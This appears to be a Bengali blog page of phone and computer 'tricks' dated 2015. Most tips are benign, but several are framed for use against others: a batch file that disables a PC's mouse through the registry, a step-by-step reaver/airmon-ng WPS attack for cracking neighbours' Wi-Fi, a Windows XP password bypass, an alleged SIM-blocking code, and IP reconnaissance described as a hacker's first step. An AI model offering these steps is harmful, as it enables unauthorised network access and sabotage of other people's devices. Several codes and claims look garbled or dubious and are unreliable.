25/05/2015

আজকে আপনাদের শিখাবকিভাবে Bluetoothদিয়ে এক মোবাইলথেকে আরেকমোবাইলে মেসেজপাঠাবেন?

আজকে আপনাদের শিখাব কিভাবে Bluetooth দিয়ে এক মোবাইল থেকে আরেক মোবাইলে মেসেজ পাঠাবেন? ১। আপনার মোবাইলে নোট অপশন এ গিয়ে আপনার মেসেজ লিখে সেভ করুন। ২। এবার অপশনে গিয়ে send>via bluetooth>send করুন। এভাবে যাকে ইচ্ছা তাক পাঠাতে পারবে। শেয়ার করে বন্ধুদের জানিয়ে দিন

এখনআপনি ছাড়া আপনারমোবাইল থেকে কেউকলকরতে পারবে না

এখন আপনি ছাড়া আপনার মোবাইল থেকে কেউ কল করতে পারবে না এইটা য আগে জানেন তাইলে ভালো । না জানলে জেনে নিন । আজ আপনাদের আমি জানাব কিভাবে আপনার নিজের মোবাইল দিয়ে অন্য কেউ কল দিতে না পারে । এজন্য আপনাকে যেতে হবে :-- SETTINGS>CALL SETTINGS>SEND MY CALLER ID> (SELECT YOU)NO এখন যে কেউ আপনার মোবাইল থেকে কল দিতে পারবে না । যখন আপনি কাউকে কল দিবেন তখন তার নাম্বারের আগে শুধু *31# বসিয়ে দিবেন । ব্যাস এখন মজা দেখুন । এতে যদি আপনারা উপকৃত হন তাহলে লাইক দিয়ে জানাবেন । কোনো ভুল হলে তা ক্ষমার দৃষ্টিতে দেখবেন । পরের পোস্ট মিস করতে না চাইলে লাইক দিয়ে এক্টিভ থাকুন

কম্পিউটার এর মাউস অচল করে দিন,দয়া করে কারো ক্ষতি করবেন না

কোড গুলো নোটপ্যাড এ পেস্ট করে Save As দিয়ে Desktop এ Save করুন alok.bat নামে

@echo off set

key=”HKEY_LOCAL_MACHINEsystem CurrentControlSetServicesMouclass”

reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4

সমাধান:-

কোড গুলো নোটপ্যাড এ পেস্ট করে Save As

দিয়ে Save করুন alok.bat নামে @echo off set

key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass” reg delete %key% reg add %key% /v Start /t REG_DWORD /d 1 ক্লিক করলেই মাউস সচল হয়ে যাবে.

Robi to Robi Mb Transfer

robi-robi MB transfar 10 MB

*141*712*11*YOUR NUMBER# 25 MB

*141*712*9*YOUR NUMBER# 60 MB

*141*712*4*YOUR NUMBER#

যেকোন সিম ব্লক করুন কয়েক সেকেন্ডে

আগেই বলে রাখি দুষ্টুমী করে কেউ এই কাজ করবেন না । যখন প্রয়োজন হবে তখনই কাজটা করবেন । কাজ বলতে আপনি যে সিম ব্লক করতে চান ঐ সিম থেকে ডায়াল করুন

*04*3814*7529*68243#

মোবাইল এ টাকা নেই ? টাকা ছাড়াই বাংলালিংক সিম দিয়ে মিসকল দিন ।

মোবাইল এ টাকা নেই ? টাকা ছাড়াই বাংলালিংক সিম দিয়ে মিসকল দিন । ধরুন আপনার ব্যালেন্স নাই। কিন্তু কাউকে কল করা খুব জরুরী। মিসকল দেওয়ারও টাকা নাই। কি করবেন?.নো টেনসন। আমি আপনাকে শিখাচ্ছ এবং এসএমএস করা যে কোন নাম্বারে। উপকরণঃ বাংলালিংক সিম। কর্মপদ্ধতিঃ ১.প্রথমে ডায়াল করুন *321# নাম্বারে। ২.তারপর Reg. করার জন্য 1 লিখে রিপ্লে দিন। কাজ প্রায় শেষ। ৩.এখন আপনি যাকে যাকে SMS দিতে চান 3212# তাদের নাম্বার গুলো এড করুন। কাজ শেষ। ৪.এখন 3215# ডায়াল করলেই কাঙ্কিত নাম্বারগুলোতে চলে jabe এসএমএস। সামনে আমার পরিক্ষা এজন্য সবাই দোয়া করবেন

প্রতিবেশীদের WIFI HACK করুণ (এক্সপার্ট দাদাদের জন্য নয়) Tutorial.2

প্রতিবেশীদের WIFI HACK করুণ (এক্সপার্ট দাদাদের জন্য নয়) এইটা করার জন্য আপনাকে অবশই লিনাক্স এর যে কোন ভার্সন ইন্সটল করে নিতে হবে তবে ভাল হয় যদি (Linux mint,Ubuntu , kbuntu) এসব ভার্সন ইন্সটল করা থাকে । এবার ctrl+alt+t press করুন terminal ওপেন করুন please install Aircrak-ng by typing - sudo apt- get install aircrack-ng এইটা লিখে এন্টার করুন যথারীতি আপনার পিসির পাসওয়ার্ড চাইবে পাসওয়ার্ড লিখে এন্টার করুন আর হ্যাঁ এর আগে নেটটা পিসির সাথে connect করতে ভুলবেন না । তারপর আবার ইন্সটল করুন Reaver pls type : sudo apt-get install reaver আবার আগের মত এন্টার চাপার পর পাসওয়ার্ড চাইবে ,পাসওয়ার্ড দিন অ্যান্ড এন্টার এবার নেট connection অফ করে পিসি restart করুন। এবার আপনাকে অবশ্যই সামান্য ধৈর্যর পরীক্ষা দিতে হবে terminal ত ওপেন ই আছে না থাকলে ওপেন করে নিন টাইপ করুন sudo airmon-ng start waln0 লিখে এন্টার করন পাস কোড চাইবে দিন দেখবে নিচে একটা লেখা আসবে ( monitor mode enabled on mon1/mon0/mon4) ব্যাস হয়ে গেল প্রথম স্টেপ please type : sudo airodump-ng mon0 (এখানে MONO র সাথে zero hobe ) এবার আপনি দেখবেন আশে পাশের ওয়াইফাই র নেট গল শো করছে now final step press cntrl+c sudo reaver -i mon0 -b (your desired bssid) - vv -d 0 -S example : sudo reaver -i mon0 -b C8:3A:35:265:31 -vv -d 0 -s press enter and wait for while, then u will show after some time like this wps pin:25452006 wps psk:sakkhor /whatever they used their name as network ap ssid : tplink /tenda/whaterver they used enjoy !!!!!!!!!!! enjoy!!!!!!!!! enjoy!!!!!!!! THIS WILL BE WORKED ON THIS TYPE NETWORK WPA/WPA2 TYPE NETWORK

১ সাথে ১০ টি সিম ওপেন রাখুন।

আমাদের সবার সিম প্রায় ৫-৬ টি কিন্তু সব সিম ওপেন রাখা সম্ভব না। তবে হা আপনার বন্ধ সিমে জদি কেউ কল করে তবে আপনার চালু ফোনে ঐ কল টি আনা সম্ভব এ জন্য আপনাকে বন্ধ সিমে ২ টাকা up রাখতে হবে। এবার ডাইয়াল করুন ২১চালু রাখা নম্বর# এভাবে আপ নি ১০ টি no ডাইভার্ট কর তে পারবেন। ডাইভার্ট cancel কর্তে #২১# D সিম ওপেন কর লে আগের Balance 0 হয়ে যাবে। ভালো লগলে thanks দিতে ভুলবেন না ।

কম্পিউটার ইউজার পাসওয়ার্ড হ্যাক ( Easy )

কম্পিউটার ইউজার পাসওয়ার্ড হ্যাক . . . ধাপসমূহঃ ১. কম্পিউটার Start করুন । ২. কম্পিউটার এর Login Skin আসবে । ৩. এক সাথে কী -বোর্ড এর Ctr+alt+delete এইটা চাপ দিলে একটা নতুন উইন্ডো শো করবে । এখানে একটা User Box আরেকটা Password Box দেখা যাবে । ৪. এখানে আপনি লিখবেন User Box এ administrator এবং Password Box টা খালি রাখবেন । ৫. ==== Ok ==== দিন । ৬. এখন User Account এইখানে আপনি সকল User দের দেখবেন এখন আপনি চাইলেই User এর Password Remove করতে পারবেন । [ বিঃদ্রঃ শুধুমাত্র Windows Xp এর জন্য প্রযোজ্য ] any problem call me.. 01731040246

চরম পোষ্ট আপনার জাবা মোবাইল রিস্টাটদিলেও নাম্বার ডিলেট হবে Na..

আজ আপনাদের শিখাব কি ভাবে আপনার মোবাইল এর নাম্বার গুলি কি ভাবে একবারে র জন্য মোবাইল এ সেভ করবেন মানে যদি আপনি আপনার মোবাইল বন্ধ করেন বা রিস্টাট দেন । আপনার মোবাইল এর নাম্বার যাবেনা। তাহলে শুরু করি। প্রথমে আপনি মোবাইলের এর Settings এ যান। তারপর সিলেক্ট করুন Security Settings এখন Security Settings এ গিয়ে আপনি Security Level / Phone Security এ দেখতে পাবেন। তারপর Security Level এতে থাকবে Phone , None & Memory এবং আপনি Phone Ok করবেন। আর Phone Security তে থাকবে On&Off এবং আপনি On & Ok করে দিন ব্যাস কাজ শেষ এখন আপনি যদি আপনার ফোন রিস্টাট দেন তবেও আপনার নাম্বার যাবেন। ধন্যবাদ যদি কোনো ভুল হয় তবে ক্ষমার চোখে দেখবেন এত কস্ট করে পোস্টটা লিখলাম Thanks টা ও পাবোনা ?

^ আইপি এড্রেস এবং তার খুঁটিনাটী ^

আইপি এড্রেস এবং তার খুঁটিনাটী। by hafez IP Address কি? IP Address বা Internet ProtocolAddress হল একটি সংখ্যাবিশেষ যা Network-এ যুক্তপ্রতিটি Device-এর জন্যনির্ধারিত যারা Communication-এর জন্য Internet Protocol ব্যবহার করে। প্রতিটি IP Address হলUnique, আপনি যখনএকটা নির্দিষ্ট IP Addressব্যবহার করছেন তখন সেটা আরকেউ ব্যবহার করারসম্ভবনা নেই IP Address দিয়েই Networkব্যবহারকারীকে শনাক্তকরা হয়। আপনি যে Internet Service Provider-এর কাছ থেকে Internetসেবা পাচ্ছেন তারা এই IPAddress-এর মাধ্যমেই আপনাকে আলাদাভাবে শনাক্তকরতে পারে। IP Address-এর কাজকি? IP Address-এর মূলত দু’টি কাজরয়েছে। 1.Host বা Network Interfaceশনাক্তকরণ,যাতে আপনি সঠিকভাবে আপনারকাঙ্খিত Communicationসম্পন্ন করতে পারেন। 2.Network ব্যবহারকারীরঅবস্থান খুঁজে বের করা। প্রতিটা IP Addressএকটা নির্দিষ্টস্থানকে নির্দেশ করে।তাই, আপনি কোন জায়গা থেকে Networkব্যবহার করছেন এটা IPAddress- এরমাধ্যমে জানা যায়। IP Adderss-গুলো হল Binary Number,কিন্তু বোঝার সুবিধার জন্যএগুলোকে মানুষের পঠনযোগ্যসংকেত (অক্ষর বা সংখ্যা) দিয়ে প্রকাশ করা হয়ে থাকে। হ্যাকারদের জন্যএকটি অতি গুরুত্বপূর্ণ জিনিসহচ্ছে এই IP Address. যেহেতু IPAddress-এর মাধ্যমে Network ব্যবহারকারীর স্থানজানা যায়, তাই হ্যাকারের জন্য IP Address লুকিয়ে রাখা খুবইজরুরী একটা কাজ। নাহলে হ্যাকারের অবস্থানফাঁস হয়ে যাওয়ার একটা চান্সথাকে। আপনার নিজের আইপি এড্রেস দেখা br /> প্রথমে Start->Run- >খালি ঘরে লিখুন cmd এবার কী-বোর্ড থেকে এন্টার চাপুন। একটি কমান্ড এরিয়া দেখতে পাবেন। সেখানে লিখুন netstat -n এন্টার চাপুন। একটি লিস্ট আপনার সামনে আসবে। লোকাল এড্রেসের দিকে খেয়াল করুন। যেটি প্রথমে আসবে সেটিই আপনার আইপি এড্রেস। দ্বিতীয় নিয়মbr /> আপনার ব্রাউজারের এড্রেস বারে লিখুন www.whatismyip.com একটি ওয়েবসাইট খুলবে। সেখানেই বড় অক্ষরে আপনি আপনার বর্তমান আইপি দেখতে পাবেন। নিচের লিস্টটি মনে রাখুন। পরবর্তীতে কাজে লাগবে। ftp—->21smtp—>25dns—->53http— >80https—->81pop3—->110telnet— >23 নাম্বারগুলো হচ্ছে পোর্ট নাম্বার। কোন ওয়েবসাইটের আইপি বের করার নিয়ম br /> যদি আপনি কোন ওয়েবসাইট বা কোন ব্যক্তির একাউন্ট বা তার পিসি হ্যাক করবেন তাহলে সবর্প্রথম যে কাজটি করতে হবে তা হচ্ছে তার আইপি এড্রেস সংগ্রহ করা। যতক্ষন পযর্ন্ত না আপনি তার আইপি এড্রেস বের করতে পারছেন ততক্ষন পযর্ন্ত আপনি তার কি ই বা করতে পারবেন? এখন আপনাদের দেখাচ্ছি যেভাবে কোন ওয়েবসাইটের আইপি এড্রেস বের করবেন। প্রথমে Start->Run- >খালি ঘরে লিখুন cmdএবার কী-বোর্ড থেকে এন্টার চাপুন। একটি কমান্ড এরিয়া দেখতে পাবেন। সেখানে লিখুন tracert websitenameএন্টার চাপুন। এখন কিছু তথ্য স্বয়ংক্রিয়ভাবে আপনার সামনে আসবে। আপনি সেখানে নীল রংয়ের কিছু লেখা দেখতে পাবেন। আপনি সেখানেই আপনার কাঙ্খিত আইপি এড্রেসিট দেখতে পাবেন। নীল লেখাগুলোর প্রথম লাইনেই আপনি আইপিটি দেখতে পাবেন। দ্বিতীয় লাইন সহ এভাবে সবোর্চ্চ ৩০টি হুপ দেখতে পাবেন। হুপের ব্যাখ্যা br /> যখন আপনি কোন ওয়েবসাইটে প্রবেশের চেষ্ঠা করেন তখন আপনি স্বয়ংক্রিয়ভাবে কিছু তথ্য সেই ওয়েবসাইটের কাছে প্রেরন করেন যার প্রতিউত্তরে সেই সেই ওয়েবসাইটটিও আপনার কাছে কিছু তথ্য প্রেরন করে (যার ফলাফল স্বরূপ আপনি ওয়েবসাইটটিকে দেখতে পান) ।এই প্রক্রিয়াটি চলতেই থাকে। মনে করুন আপনি কমান্ড এরিয়ায় লিখলেন tracert yahoo.com তখন আপনার এই তথ্যের প্যাকেজটি গুগলের সার্ভারে (যেখানে তথ্য জমা থাকে) যাবে। গুগলও আপনাকে এর প্রতিউত্তর পাঠাবে। যেহেতু গুগল একটি বড় সাইট সেহেতু এর অনেকগুলো সার্ভার রয়েছে। সুতরাং প্রতিউত্তরগুলো সেসকল সার্ভার থেকেই আসে। এবার আপনি আপনার কমান্ড এরিয়ায় লক্ষ করুন সেখানে সবোর্চ্চ ৩০ টির মত আইপি হুপ রয়েছে। এতগুলো আসার মানে হচ্ছে, গুগল তার যতগুলো সার্ভার থেকে আপনার কাছে তথ্য প্রেরন করছে সেই সার্ভারগুলোর আইপি হুপই আপনি দেখতে পাচ্ছেন। কমান্ড এরিয়ায় আপনি * ধরনের কিছু চিন্হ দেখতে পাবেন। এর মানে হচ্ছে এই যে সে স্থানগুলোতে ফায়ারওয়াল স্থাপন করা রয়েছে যাতে করে যে কেউ সহজে আক্রমন করতে না পারে। সাধারন ভূল-ধারনা br /> অনেকেই আছেন যারা মনে করেন যে ইন্টারনেট থেকে কোন উচ্চক্ষমতা সম্পন্ন স্পশর্কাতর তথ্য বা তথ্যাদি দেখা বা জানা যায় না। আসলে এটি ভূল ধারনা। মনে করুন ইন্টারনেটে অনেকেই হটফাইল বা রেপিডশেয়ারের প্রিমিয়াম একাউন্ট দেয়, যা থেকে আপনি উপকৃত হন। কিন্তু সমস্যা হচ্ছে আপনি জানেন না এই একাউন্ট কোথা থেকে দেয়া হয়েছে? আপনি ইচ্ছে করলেই এসব তথ্য জানতে পারেন। যখন আপনি কমান্ড এরিয়ায় কোন ওয়েবসাইটের বিপরীতে nslookup লিখে এন্টার দিবেন তখন হয়ত এরকম লেখাও আসতে পারে যে You are now authentized to this route. এ রকম কিছু লেখা দেখলেই আপনি বুঝে নেবেন যে, ওই ওয়েবসাইটে স্পশর্কাতর তথ্য রয়েছে। ওই ওয়েবসাইট সম্পর্কে বিস্তারিত জানতে আপনি নিচের ওয়েবসাইটগুলো ব্যবহার করতে পারেন। samspade.com dnsstuff.com whois.netঐ সকল ওয়েবসাইটে শুধুমাত্র ওয়েবসাইটটির নাম দিয়েই আপনি এর আইপি, স্থান, মালিকের নাম, কবে কেনা হয়েছে, মেয়াদ কত দিনের, দৈনিক ভিজিটর সংখ্যা, নেম সার্ভার ইত্যাদি বিভিন্ন তথ্য জানতে পারবেন। তথ্য জোগাড় করা একজন হ্যাকারের প্রাথমিক কাজ ।

তৈরি করুন একটি অদৃশ্য ফোল্ডার

কিভাবে একটি নিউ ফোল্ডার তৈরি করতে হয় সেটা আমরা সবাই জানি । ফোল্ডার তৈরি করে অনেক গুরুত্বপূর্ণ ডকুমেন্টস তাতে রাখি এবং কোন ফোল্ডারে কি ধরনের ডকুমেন্টস আছে তা বুঝার সুবিধার্থে ফোল্ডার এর নাম দিয়ে থাকি । এখন আমরা যদি এমন একটা ফোল্ডার তৈরি করি যেটি কেউ দেখতে পাবে না তাহলে কেমন হয় ! আসুন দেরি না করে একটি অদৃশ্য ফোল্ডার তৈরি করে ফেলি । প্রথমে আপনি একটি New Folder তৈরি করুন, যখন New Folder লিখাটি নীল রং এ সিলেক্ট করা থাকবে তখন keyboard এর ডান পাশের Alt চেপে ধরে 0160 চাপুন , এবার Alt key থেকে আঙুল সরিয়ে নিন এবং Enter এ ক্লিক করুন। এবার দেখুন একটি নাম ছাড়া ফোল্ডার তৈরি হয়েছে । এখন এই নাম ছাড়া Folder এ mouse এর right buttome ক্লিক করে Properties এ যান , তারপর customize > change icon এ ক্লিক করুন, তারপর icon window থেকে একটি blank icon সিলেক্ট করুন এবং ok তে ক্লিক করুন। এবার দেখুন আপনি একটি অদৃশ্য Folder তৈরি করেছেন।

টিপসঃ এবার অন্যের hide করা picture দেখুন (NokiaJava)

এবার অন্যের hide করা picture দেখুন প্রায় অনেকেই picture hide করে তাকেন কিন্তু picture গুলা আপনি দেখতে পারবেন প্রথমে setting>display set>walpeper set> এখন siadeshow সিলেক্ট করুন এবার on scren এ যান এবং একে একে picture গুলো দেখুন।

আপনার sim কি block হয়ে আছে ? খুলতে পারছেন না ? খুলতে গেলেই password চাই ?…※ কোন সমর্সা নেই , আপনেই আপনার sim block remove korte পারবেন , ১. পথমে *2767*2878# ডায়েল করেন restart হবে এবার password চাইলে যেকোন 4 সংখা দেবেন , যতবার চাবে ঐ একি স ;খা দেবেন . ২

আপনার sim কি block হয়ে আছে ? খুলতে পারছেন না ? খুলতে গেলেই password চাই ?…※ কোন সমর্সা নেই , আপনেই আপনার sim block remove korte পারবেন , ১. পথমে 27672878# ডায়েল করেন restart হবে এবার password চাইলে যেকোন 4 সংখা দেবেন , যতবার চাবে ঐ একি স ;খা দেবেন . ২. 27672878# কাজ না করলে 27673855# ডায়েল করেন

♣ আন্ড্রয়েড এর কিছু কোড জেনে নিন ♣

আন্ড্রয়েড এর কিছু কোড জেনে নিন ##7780#*#* = factory data reset

*2767*3855# = factory format

*#*#34971539#*#* = get information about phone camera

*#*#7594#*#* = End Call / Power

*#*#273283*255*66328­2*#*#* = File copy screen where you can backup your media files

*#*#197328640#*#* = Service mode

*#*#232339#*#* OR ##526#*#* OR ##528#*#* = WLAN test (Use "Menu" button to start various tests)

*#*#232338#*#* = Shows WiFi MAC address

*#*#1472365#*#* = GPS test

*#*#1575#*#* = Another GPS test

*#*#232331#*#* = Bluetooth test

*#*#232337#*# = Shows Bluetooth device address 0

Folder password দিন software ছাড়া সহজ পদ্ধতিতে।

Software ছাড়া Folder-র Password দেয়া যায় । সে জন্য যে Folderটি password দিতে চান তার উপরmouse pointer রেখে right button click করুন । এবার Send to option এরcompressed (zipped) folder-এclick করুন । এতে folder-টি zip folder-এ পরিনত হবে । এখন zip folder-টির উপর mousepointer রেখে right button click করুনএবং open with-এর compressed zipped) folder-এ click করুন । এতে নতুন যে window আসবে,সেখানে যেকোন খালি জায়গায়compressed (zipped) folder-এclick করে add a password-এ clickকরতে হবে এবং password ও confirmpassword – এ একটি গোপন numberদিয়ে ok করুন । তারপর folder openকরে দেখুন আপনার passwordহয়ে গেছে ।

Mega Post সমস্ত চায়না মোবাইল ফোন সিক্রেট কোড…

সমস্ত চায়না মোবাইল ফোন সিক্রেট কোড…
*#66#* সেট কারখানার মোড নিশ্চিত
*#8375# দেখাও সফ্টওয়্যার সংস্করণ নিশ্চিত
*#1234# A2DP ACP মোড নিশ্চিত
*#1234# A2DP INT মোড নিশ্চিত
*#0000# পাঠান: ডিফল্ট ভাষা নিশ্চিত সেট করুন
*#0007# পাঠান: রাশিয়ান নিশ্চিত ভাষা সেট করুন
*#0033# পাঠান ফরাসি ভাষা সেট নিশ্চিত
* # 0034 # পাঠান: স্পেনীয় ভাষা সেট নিশ্চিত
* # 0039 # পাঠান: ইতালিয় নিশ্চিত ভাষা সেট করুন
* # 0044 # পাঠান: ইংরেজি নিশ্চিত ভাষা সেট করুন
* # 0049 # পাঠান: জার্মান ভাষা সেট নিশ্চিত
* # 0066# পাঠান: থাই ভাষা সেট নিশ্চিত
* # 0084 # পাঠান: নিশ্চিত ভিয়েতনামি ভাষা সেট করুন
* # 0966 # পাঠানbr /> আরবি ভাষা সেট নিশ্চিত * # 800 # Itel E1০ মডেল প্রদর্শন বার্তা বি টি ক্ষমতা করতে. কিন্তু প্রদর্শনের জন্য এটি আইকনে ব্লুটুথ ক্ষমতা. অনুরূপ (আসলে টন তোলেবি টি আটকে গেছে, কিন্তু পরে টন পুনরায় আরম্ভ হয়ে স্বাভাবিক না y সম্পর্কে>) আরো কোড CHAINA মোবাইল ফোন RESET করুন
* # 77218114 #
* # 881188 #
* # 94267357 #
* # 9426 * 357 #
* # 19912006#
* # 118811 # * # 3646633 #
এছাড়াও পাওয়া এইসব পরিষেবা কোড
Konkabr /> C926 সফ্টওয়্যার সংস্করণের: * 320
# পাঠান
C926 সেট ডিফল্ট ভাষা: * # 0000 # পাঠান
C926 সেট ইংরেজি ভাষা: * # 0044#
পাঠান পরিষেবা কোড GStarbr /> GM208 (CHAINA NOKIA 6230 ) প্রকৌশল মেনু: *
# 66 # *
ইংরেজি ভাষা সেট করুন: * # 0044 #
রাশিয়ান ভাষা সেট করুন: * # 0007#
ZTE মোবাইল:> 1 – 938 737381 #
2 – ফোন DONE DIPLAYED হবে
3 – আপনি আবার চালু ফোন এবং POWER প্রতিরোধ ক্ষমতা
Alcatel:> E205 ফোন কোড উদ্ঘাটন শুধুমাত্র, * 847 টিপুন
simcard ছাড়া #
E900 সফ্টওয়্যার সংস্করণের: *# 5002 #8376263 E900 পূর্ণ
রিসেট করুন:
# 2767 * 3855
পরিষেবা কোড মশলার
S404 সক্ষম COM পোর্ট:
* 42253646633 # # ->
ডিভাইস -> সেট UART -> PS -> UART1/115200 S410 প্রকৌশলী মোড: * # 3646633 #
S900 সফ্টওয়্যার সংস্করণের: * # 8375 #
S900 সিরিয়াল নং: # 33778
# পরিষেবা কোড PHILIPSbr /> S200 সক্ষম COM পোর্ট:
# 3338913 # ->
ডিভাইস -> সেট UART -> PS ->
UART1/115200
পরিষেবা কোড “CHAINA MODEL: ব্যবহারকারীর ডিফল্ট কোড:
1122,
3344,
1234, 5678
প্রকৌশলী মোড: # 110 01 #
ফ্যাক্টরি মোড: * # 987 #
ডিভাইস – -> সেট UART -> PS
Config ->
UART1/115200 # 110 01 #br /> COM পোর্ট সক্ষম করুন
ফ্যাক্টরি সেটিংস পুনরুদ্ধার করুন: *
# 987 * 99 #
LCD র বিপরীতে: * # 369 #
সফ্টওয়্যার সংস্করণের: * # 800 #
সফ্টওয়্যার সংস্করণের: * # 900 #
পরিষেবা কোড BenQbr />
সফ্টওয়্যার সংস্করণের: # 300 # পরীক্ষণ মোড: # 302 * 20040615 #
পরিষেবা কোড Pantechbr /> সফ্টওয়্যার সংস্করণের: 01763 79837 #
সেবা মেনু: 01763 476 # ডিফল্টে রিসেট (ফোন / ব্যবহারকারীর ডিফল্ট কোড রিসেট): 01763 737381 #
পরিষেবা কোড VK মোবাইল ** x, 5xx: সফ্টওয়্যার সংস্করণের: * # 79 #
সফ্টওয়্যার সংস্করণের: * # 837 #
সেবা মেনু: # 85 364 # (# রাখা)
পরিষেবা কোড VK200, VK2000, VK2010, VK2020, VK4000br />
সফ্টওয়্যার সংস্করণের: * # 79 #
সেবা মেনু: # 9998 # 8336 (# রাখা) ডিফল্টে রিসেট
(ফোন / ব্যবহারকারীর ডিফল্ট কোড রিসেট):
# 9998 #
7328 (# রাখা)
পরিষেবা কোড LGbr />
সফ্টওয়্যার সংস্করণ: 2945 # * #
KG300 NVRAM বিন্যাসে: 2945 # * # -> মেনু 15
SONY ERICSION-পরিষেবা কোড
J100 সফ্টওয়্যার
সংস্করণের: # 82 #
পরিষেবা কোড ফ্লাইbr /> M100
সফ্টওয়্যার সংস্করণের: # # # # 0000 # 2040 (ঝ) ডিফল্টে রিসেট করুন:
* # 987 * 99 # পাঠান MX200 ডিফল্টে রিসেট করুন:
* # 987 * 99 # পাঠান
MX200 সফ্টওয়্যার সংস্করণের:
* #900 # পাঠান
SL300m ডিফল্টে রিসেট করুন:
* # 987 * 99 # পাঠান
SL300m সফ্টওয়্যার সংস্করণের: * #900 #
পাঠান
SL500m ডিফল্টে রিসেট করুন:
* # 987 * 99 # পাঠান
SL500m সফ্টওয়্যার সংস্করণের:
* #900 # পাঠান
MP500 ডিফল্টে রিসেট করুন:
* #987 * 99 # পাঠান
MP500 সফ্টওয়্যার সংস্করণের:
* #900 #
পাঠান ইংরেজি ভাষা সেট করুন:
C926 সফ্টওয়্যার সংস্করণের: * 320 # পাঠান C926 সেট ডিফল্ট ভাষা: * # 0000 # পাঠান C926 সেট ইংরেজি ভাষা: * # 0044 # পাঠান পরিষেবা কোড GStarbr /> GM208 (CHAINA NOKIA 6230 ) প্রকৌশল মেনু: # 66 # ইংরেজি ভাষা সেট করুন: * # 0044 # রাশিয়ান ভাষা সেট করুন: * # 0007 # পরিষেবা কোড Motofone-F3br /> Motofone F3 সফ্টওয়্যার সংস্করণের: * 9999 পাঠান * 300 * সেট সিম পিন * 310 / ** 311 * সিম পিন চালু | বন্ধ * 000 * রিসেট কারখানার সেটিংস * 644 * সেট ভয়েসমেইল নম্বর * 260 / ** 261 * অন অটো keypad লক | বন্ধ অফ | * 510 / ** 511 * ভয়েস অন জিল্লুর * 160 / ** 161 * সীমাবদ্ধ আহ্বান (শুধুমাত্র ফোনবুক) | বন্ধ সফ্টওয়্যার সংস্করণের: 200608 * * পাঠান সফ্টওয়্যার সংস্করণের: 200606 * * পাঠান 200806 * * পাঠান: আনমন সংস্করণ * 250 / ** 251 * Keypad টোন চালু | বন্ধ * 470 নির্বাচন সময় বিন্যাস ** 500 / ** 501 * প্রিপেইড উপর ব্যালেন্স প্রদর্শন | বন্ধ * 520 * ভাষা পরিবর্তন করুন পরিষেবা কোড MOTOROLAbr /> C113, C114, C115, C115i, C116, C117, C118 সফ্টওয়্যার সংস্করণের: * # 02 # C138, C139, C140 সফ্টওয়্যার সংস্করণের: * # 02 #

call block না করেও শিঙ্খা দিন বিরক্তিকর কলার কে

Call Blockনা করেওশিক্ষাদিনবিরক্তিকরকলারকে (বিনা খরচে বিনা সফটওয়্যারএ) অনেক সময় আমাদের মোবাইল এ বিরক্তিকর কল আসে । সেটা বন্ধ করতে আমরা বেছে নেই call block সার্ভিস । সে জন্য অপারেটররা প্রতি মাসে একটি নির্দিষ্ট পরিমান টাকা কেটে নেয় । এমনকি আমরা বিভিন্ন প্রকার call block সফটওয়্যার ব্যবহার করে থাকি । কিন্তু আমরা অনেকেই এই ২ টি পদ্ধতির কনটাই ব্যবহার করতে পারিনা বা চাইনা । তাই এইসব ঝামেলায় না গিয়ে আপনাদের একটা সহজ টিপস দেব । আপনারা অনেকেই হয়ত এটা জানলেও জানতে পারেন । চলুন দেখে আসি কিভাবে এটা করবেন । * জিপি, রবি, বাংলালিংক এবং এয়ারটেল গ্রহকদের জন্য * প্রথমে আপনি আপনার মোবাইল এর call divert অপশন এ জান (voice call) । তারপর সেখান থেকে Divert when busy / If busy তে চাপুন এবং Activate চাপুন । তারপর To other number এ নিচের অপারেটর অনুসারে নাম্বার বসিয়ে দিন এবং Ok চাপুন । বাস আপনার কাজ শেষ । ক) জিপি এর জন্য – ১২৬৬ খ) রবি এর জন্য – ৮১২১ গ) বাংলালিংক এর জন্য – ৭৭০ ঘ) এয়ারটেল এর জন্য – ৭৮৯ ** সিটিসেল এবং টেলিটক গ্রাহকরা তাদের voice mail নাম্বার বাবহার করে ট্রাই করে দেখেন হতেউ পারে । এবার ফলাফলঃ এখন যে কলার ই আপানাকে call করুক না কেন, আপনি শুধু call টা কেটে দিন । এখন যে আপনাকে call করেছে তার ১২টা বাজতে শুরু করেছে । অর্থাৎ তার মোবাইল এ Call টা রিসিভ হয়ে গ্যাসে । ভয় নেই, আপনার টাকা কাটবেনা । আমার কথা বিশ্বাস না হলে হাতের কাছের মোবাইল টা দিয়ে ট্রাই করে দেখুন । **cancel করতে Divert when busy / If busy তে গিয়ে cancel চাপুন । ভাল লাগলে কমেন্ট করবেন।

[HOT!] এবার তৈরী করুন এমন এক ফোল্ডার যা কেউ করতে পারবে না রিনেম, কপি, মুভ, ডিলেট

সেই ঐতিহাসিক ফোল্ডার যা সহজে ডিলিট হবে না; ফোল্ডারের নাম পরিবর্তন তো দূরের কথা। কথা না বাড়িয়ে চলুন দেখি কিভাবে আনডিলিটেবল ফোল্ডার বানানো যায়। ১) প্রথমে Start মেনু থেকে Run এ যান, ২) তার পর টাইপ করুন cmd । ৩) Enter প্রেশ করুন। ৪) যেই ড্রাইভে আনডিলিটেবল ফোল্ডার তৈরি করতে চান সেই ড্রাইভের নাম লিখুন । যেমন F: - ৫) Enter প্রেশ করুন। ৬) এবার লিখুন md এবং একটি স্পেস দিয়ে ১টি ব্যাক স্লাস দিন। ৭) তার পর lpt1 লিখে ২টি ব্যাক স্লাস দিন ৮) Enter প্রেশ করুন। 11.98 KB হা হা এবার F ড্রাইভে গিয়ে দেখুন । lpt1 নামে একটি ফোল্ডার তৈরি হয়েছে যা ডিলিট করতে চাইলে নিচের এই ম্যাসেজটি দেখাবে আর ডিলিট হবে না এবং রিনেইমও হবে না। এইভাবে তৈরি করুন lpt1, lpt2, lpt3, lpt4, lpt5…… com1, com2, com3… ইত্যাদি নামে আরো অনেক আনডিলিটেবল ফোল্ডার। 12.76 KB আশা করি ভাল লাগলে কমেন্টস করবেন

এনড্রয়েড এপস Vaulty হ্যাক করুন আর বন্ধুকে মজা দেখান

